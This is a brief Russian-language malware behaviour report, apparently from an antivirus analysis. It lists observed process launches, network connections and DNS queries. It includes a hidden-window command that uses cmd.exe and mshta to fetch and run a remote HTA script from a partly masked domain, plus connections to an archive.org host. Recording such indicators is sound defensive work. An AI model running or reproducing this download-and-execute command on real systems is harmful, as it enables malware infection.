Техническая информация
- '<SYSTEM32>\cmd.exe' /c "mshTa http://j.#p/PoenIns30ma"
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1151302.cvr
- 'j.#p':80
- 'ia#####9.us.archive.org':80
- http://j.#p/PoenIns30ma
- DNS ASK j.#p
- DNS ASK ia#####9.us.archive.org
- '<SYSTEM32>\cmd.exe' /c "mshTa http://j.#p/PoenIns30ma"' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://j.#p/PoenIns30ma